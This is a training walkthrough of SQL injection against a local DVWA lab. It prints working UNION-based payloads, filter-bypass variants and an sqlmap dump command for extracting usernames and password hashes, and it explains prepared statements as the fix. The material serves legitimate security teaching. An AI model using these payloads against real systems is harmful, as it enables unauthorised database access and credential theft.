⚠️ Lab Environment Only: The SQL injection techniques in this guide must only be practised against your own DVWA installation, PortSwigger Web Academy, or explicitly authorised targets within a bug bounty scope. SQL injection against systems you do not own is a criminal offence under computer fraud laws worldwide.
DVWA SQL injection lab 2026 is where theoretical knowledge meets practical exploitation — and where most beginners discover the gap between understanding what SQL injection is and actually executing it. This lab walkthrough covers every step from the initial quote test to a complete database dump, at all four DVWA security levels. By the end you will have manually extracted usernames and password hashes, bypassed two different filter implementations, and automated the entire process with SQLmap for comparison.
🎯 What You’ll Master in Lab 7
Confirm SQL injection using error-based detection at DVWA Low security
Execute union-based injection to extract database name, tables, and columns
Dump the DVWA users table and retrieve MD5 password hashes
Bypass quote-escaping at Medium security using numeric injection
Automate the full database dump with SQLmap and understand the output
⏱️ 60 min read · 3 hands-on exercises
📊 What is your SQL injection experience level?
✅ This lab builds from first principles. If you have only used SQLmap, the manual injection section will completely change how you understand the vulnerability. If you are already comfortable with basics, the Medium and High security bypass sections cover filter evasion techniques used in real targets.
SQL injection has been in the OWASP Top 10 for over a decade and remains one of the most prevalent vulnerabilities in real web applications. If you completed DVWA Lab 3 on command injection, you already understand the core principle of injection attacks — user input being interpreted as executable code rather than data. SQL injection applies this same principle to database queries. The full DVWA lab series covers each OWASP Top 10 category with hands-on exploitation and remediation analysis.
Lab Setup — DVWA SQL Injection Module at All Security Levels
START DVWA AND NAVIGATE TO SQL INJECTION MODULE
# Start DVWA (Docker)
docker start dvwa
# Or native install
sudo service apache2 start && sudo service mysql start
# Open Firefox, navigate to DVWA
http://127.0.0.1/dvwa/login.php
# Login: admin / password
# Set security to Low: DVWA Security > Submit
http://127.0.0.1/dvwa/security.php
# Navigate to SQL Injection module
http://127.0.0.1/dvwa/vulnerabilities/sqli/
# Enable Burp Suite proxy before starting
DVWA SQL Injection Low — Error Detection to Full Database Dump
The DVWA SQL injection module presents a single input field: “User ID”. The application queries the database for a user with the matching ID and returns their first and last name. The underlying query looks like: SELECT first_name, last_name FROM users WHERE user_id = '$id'. The single quotes around $id — with no sanitisation — make this directly injectable.
⚡ EXERCISE 1 — KALI TERMINAL (25 MIN)
Manual Union-Based SQL Injection — From Error Detection to Credential Dump
✅ What you just learned: This seven-step manual injection workflow is the foundation of every union-based SQL injection attack — from initial quote test through column enumeration to full credential extraction. The methodology is identical whether you are in DVWA or a real web application. Understanding each step prepares you to adapt when filters block specific syntax, when column counts differ, or when the database engine is PostgreSQL or MSSQL instead of MySQL.
📸 Screenshot the final credential dump output showing usernames and hashes and share in #dvwa-labs on Discord. Tag #sqli2026
Union Based SQL Injection — Extracting Tables, Columns and Credentials
The union-based technique works because the original query returns exactly two columns (first_name and last_name) and both are displayed in the page response. Your UNION SELECT must match this exact column count, and the data types must be compatible. The key insight is that information_schema — a metadata database present in all MySQL installations — contains the structure of every other database, allowing you to enumerate tables and columns before targeting specific data.
securityelites.com
Union-Based Injection — Query Flow
Original query:
SELECT first_name, last_name FROM users WHERE user_id = ‘1’
Injected query (7-step payload):
SELECT first_name, last_name FROM users WHERE user_id = ‘1’
UNION SELECT user, password FROM users–
Result displayed in page:
ID: 1 First name: admin Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1 First name: gordonb Surname: e99a18c428cb38d5f260853678922e03
📸 Union-based SQL injection query flow — the injected UNION SELECT appends rows from the users table to the original query result, displaying credentials in the page response.
Medium and High Security — Filter Bypass Techniques
⚡ EXERCISE 2 — KALI TERMINAL (20 MIN)
Bypass Quote Escaping at Medium Security and Comment Filter at High Security
⏱️ Time: 20 minutes · DVWA Medium then High security level
MEDIUM SECURITY — NUMERIC INJECTION VIA BURP REPEATER
# Medium security uses mysql_real_escape_string() — escapes single quotes
# BUT the user_id field is numeric — no quotes needed in the query
# Capture the POST request in Burp and send to Repeater
# Modify the id parameter directly — no quotes required:
id=1 UNION SELECT user,password FROM users–+&Submit=Submit
First name: admin Surname: 5f4dcc3b5aa765d61d8327deb882cf99
# Quote escaping is irrelevant — numeric injection bypasses it entirely
## HIGH SECURITY — Uses LIMIT 1, different comment style needed
# High security uses a separate page to submit the ID
# Single quotes work but — comments are blocked
# Use # as MySQL comment character instead
1′ UNION SELECT user,password FROM users#
First name: admin Surname: 5f4dcc3b5aa765d61d8327deb882cf99
# Key: # is a valid MySQL comment — bypasses — filter
✅ What you just learned: Blacklist filters that block single quotes fail against numeric injection. Filters that block — comments fail against # comments. Filters that block UNION fail against URL-encoded UNION (%55NION) or case variation (uNiOn). There is always a bypass — which is why prepared statements are the only real fix. The pattern you see here — each security level adding one more filter, each filter having one bypass — is exactly what you encounter in real applications.
📸 Screenshot the Medium security bypass showing credential dump via numeric injection and share in #dvwa-labs on Discord.
SQLmap DVWA Automation — Verify Manual Findings With One Command
⚡ EXERCISE 3 — KALI TERMINAL (15 MIN)
Automate the Full Database Dump With SQLmap Using a Captured Burp Request
# SQLmap automatically cracks MD5 hashes using built-in wordlist
# Compare: same results as manual injection, but in seconds
✅ What you just learned: SQLmap with a saved Burp request file is the professional workflow for SQL injection automation — it preserves the exact session cookies and headers needed for the request to succeed. The comparison between manual and automated results is the key learning: SQLmap produces identical output but does not teach you the underlying mechanics. Manual first, SQLmap second is the methodology that builds real skill and ensures you understand what the tool is doing.
📸 Screenshot the SQLmap –dump output showing cracked passwords and share in #dvwa-labs on Discord. Tag #sqlmap2026
Blind SQL Injection — When No Output Is Returned
DVWA’s SQL injection module is an in-band scenario — you can see query results directly on the page. Most real-world SQL injection is blind. The application is vulnerable, but it returns no query output in the response. You detect and exploit it through indirect signals: boolean differences in page content, or measurable time delays in server responses.
Boolean-based blind injection: You inject a condition that is either true or false and observe whether the page response changes. If 1' AND 1=1--+ returns the normal page and 1' AND 1=2--+ returns a different response (empty, error, or different content), the application is boolean-blind injectable. You extract data one bit at a time — asking questions like “is the first character of the database name greater than ‘M’?” — and the response tells you yes or no.
Time-based blind injection: When page content does not change between true and false conditions, you use time delays. Inject a condition that causes SLEEP(5) only when true. If the response takes 5 extra seconds, the condition was true. This is slower but works in all scenarios where boolean differences are invisible — including applications that always return the same page regardless of query result.
# –technique=T = time-based only | –technique=B = boolean only
💡 DVWA SQL Injection Blind Module: DVWA has a separate blind SQL injection module at /dvwa/vulnerabilities/sqli_blind/ that is specifically designed to practice these techniques. After completing this lab, the blind module is the natural next step — same vulnerability class, but now without the luxury of seeing query results directly on the page.
How Parameterised Queries Fix SQL Injection — The Impossible Level Explained
The Impossible security level in DVWA uses PDO with prepared statements. The query becomes: $data = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;'); followed by $data->bindParam(':id', $id, PDO::PARAM_INT);. The PDO::PARAM_INT binding means the database driver casts the input to an integer before it ever reaches the query. Any attempt to inject SQL syntax results in the entire input being treated as a literal integer — which evaluates to 0 or 1 and returns no matching user.
This is the fundamental distinction between blacklist filtering (which can always be bypassed) and parameterised queries (which cannot). Parameterised queries do not try to detect malicious input — they make SQL injection structurally impossible by separating the query structure from user-supplied data at the database driver level. Every developer working with SQL should understand this distinction — and now you do too.
🧠 QUICK CHECK — DVWA SQL Injection Lab
You inject 1' ORDER BY 3--+ and receive a MySQL error, but 1' ORDER BY 2--+ returns normal results. What has this determined?
📋 Commands Used Today — DVWA SQL Injection Reference Card
1′Initial injection test — single quote breaks the query syntax
1′ ORDER BY 2–+Determine column count — increment until error
1′ UNION SELECT ‘a’,’b’–+Find displayable columns — replace NULLs with strings
1′ UNION SELECT database(),version()–+Extract database name and MySQL version
1′ UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()–+List all tables in current database
1′ UNION SELECT user,password FROM users–+Dump username and password hashes from users table
sqlmap -r request.txt -D DB -T TABLE –dumpDump full table contents including auto-cracking of common hashes
🏆 Mark Lab 7 as Complete
You have manually extracted a complete database from a vulnerable web application — the same technique used in some of the largest data breaches in history. Understanding it completely is essential for both offensive testing and defensive development.
❓ Frequently Asked Questions
What is the difference between error-based and union-based SQL injection?
Error-based injection extracts data through database error messages. Union-based appends a second SELECT statement to retrieve data from different tables, displayed alongside the original results. Union-based requires knowing the column count and only works when results are reflected in the page response.
Why do DVWA passwords appear as MD5 hashes?
DVWA uses MD5 for password storage — a fast, non-salted algorithm that was common in older applications. MD5 is trivially crackable using rainbow tables. Modern applications use bcrypt, Argon2, or scrypt, which are slow by design and include random salts that prevent rainbow table attacks.
When should I use SQLmap instead of manual injection?
Manual injection first to confirm the vulnerability and understand its type — this builds skill and gives you control. Use SQLmap once confirmed for efficient database enumeration, table dumping, and PoC report generation. In bug bounty, manual confirmation plus targeted SQLmap is the standard approach.
What does the DVWA Impossible security level use to prevent SQL injection?
Impossible level uses PDO with parameterised queries and prepared statements. This separates SQL structure from user data entirely — the database driver never interprets user input as SQL syntax. It also implements anti-CSRF tokens and input type validation as defence-in-depth. This is the correct fix and cannot be bypassed through input manipulation.
What comes after the SQL Injection lab in the DVWA series?
Lab 8 covers XSS Reflected in DVWA — injecting JavaScript payloads into reflected input fields, stealing cookies, and understanding how reflected XSS differs from stored XSS. Together, the SQL injection and XSS labs cover the two most historically common web application vulnerability classes.
Can I practice SQL injection without DVWA?
Yes — PortSwigger Web Security Academy has the best free SQL injection labs online with no local setup. The labs cover error-based, union-based, blind boolean, blind time-based, and OOB injection. HackTheBox and TryHackMe also have SQL injection challenges. For offline practice, DVWA, WebGoat, and SQLi-labs are all designed for this purpose.
DVWA Command Injection Lab 2026— Lab 3 covers OS command injection at all security levels — the injection technique that goes beyond databases to execute OS commands on the server.
SQL Injection Complete Guide— The full SQL injection category covering error-based, boolean-blind, time-based, and out-of-band injection techniques beyond what DVWA covers.
DVWA Lab Series Hub— The complete DVWA lab index with all 30 labs in sequence, covering every OWASP Top 10 category with step-by-step walkthroughs.
PortSwigger SQL Injection Labs— The most comprehensive free SQL injection training available — 18 labs covering every injection type from basic retrieval to blind time-based attacks.
OWASP SQL Injection Reference— The authoritative OWASP SQL injection documentation covering injection types, prevention techniques, and real-world case studies from major breaches.
ME
Mr Elite
Owner, SecurityElites.com
I teach manual SQL injection before SQLmap for one specific reason: I once watched a junior tester run SQLmap on an application for two hours with no results, mark the endpoint as “not injectable”, and move on. I manually tested the same endpoint in four minutes using ORDER BY enumeration and found a time-based blind injection SQLmap’s default detection had missed. SQLmap is a powerful tool with detection gaps. Manual technique closes those gaps. Learn the seven-step union method until you can do it from memory — then use SQLmap to confirm and speed up reporting, not to replace understanding.
Leave a Reply